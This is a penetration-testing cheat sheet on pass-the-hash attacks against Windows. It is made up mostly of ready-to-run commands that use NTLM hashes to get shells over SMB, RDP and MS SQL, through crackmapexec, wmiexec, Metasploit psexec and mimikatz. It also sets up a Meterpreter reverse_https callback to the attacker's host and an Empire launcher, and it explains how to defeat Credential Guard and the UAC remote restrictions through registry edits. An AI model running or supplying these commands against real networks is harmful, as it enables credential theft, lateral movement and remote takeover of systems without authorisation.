PTH: Pass the hash
Requirement:
SMB connections over ports 139/445 to a writeable share (e.g. C$, admin$)
Contents
Linux
SMB
root #
pth-winexe -U <DOMAIN>/administrator%<NT HASH>:<NTLM HASH> //$IP cmd
root #
crackmapexec --exec-method=smbexec -u Administrator -H $HASH -x cmd.exe $IP
root #
python wmiexec.py -hashes :$HASH [email protected]$HOST
MS SQL
root #
pth-sqsh -D$DATABASE_NAME -S$IP -U$SERVER_INSTANCE\\$USERNAME -mpretty
RDP
root #
xfreerdp /u:$USER /d:$DOMAIN /pth:$NTLM /v:$IP:3389
Metasploit
msf>
use exploit/windows/smb/psexec
Crackmapexec + Meterpreter
First, start meterpreter listener:
msf>
use exploit/multi/handler
msf>
set payload windows/meterpreter/reverse_https
msf>
set LHOST $LOCALIP
msf>
set exitonsession false
msf>
exploit -j
root #
crackmapexec $IP -u administrator -p $PASS -M metinject –o LHOST=$LOCALIP LPORT=444
Crackmapexec + Empire
root #
python empire --rest --user empireadmin --pass Password123!
Edit ~/.cme/cme.conf:
[Empire] api_host=127.0.0.1 api_port=1337 username=empireadmin password=Password123! [Metasploit] rpc_host=127.0.0.1 rpc_port=55552 password=abc123
root #
crackmapexec $IP/24 -u username -p password -M empire_exec -o LISTENER=test
References:
Windows
For windows use mimikatz or lmpacket wmiexec
PTH with mimikatz:
C:>
mimikatz.exe
mimikatz# sekurlsa::pth /user:$USER /domain:$DOMAIN /ntlm:$HASH
That should open a cmd.exe on the target machine.
Check hashes against network
root #
medusa -C pwdump.jd -M smbnt -H smb_hosts2.txt -m PASS:HASH -t 20 -T 10 2> /dev/null | tee medusa.smbnt
root #
crackmapexec $IP/24 -u Administrator -H $HASH
2018 update
Problems with/Defence systems: UAC
SMB signing required when STATUS_ACCESS_DENIED "HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\LanManServer\Parameters\RequireSecuritySignature" = 0 WDigest Authentication "SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential" “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\LocalAccountTokenFilterPolicy” = 1
Passing the hash does not work in all cases. For example, Windows Defender Credential Guard protects against this.
You wouldn't even be able to pass the Administrator hash. You would need to turn off Windows Defender first.
Additionally, you might have to edit the Registry. Windows operating systems starting with Vista have a User Account Control (UAC) policy setting that disallows other local administrators from running privileged tasks across the network. If you want to pass the hash of another local admin, you could disable the restriction by navigating the Registry to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft \Windows\CurrentVersion\Policies\System, and then creating a DWORD entry of LocalAccountTokenFilterPolicy with a value of 1.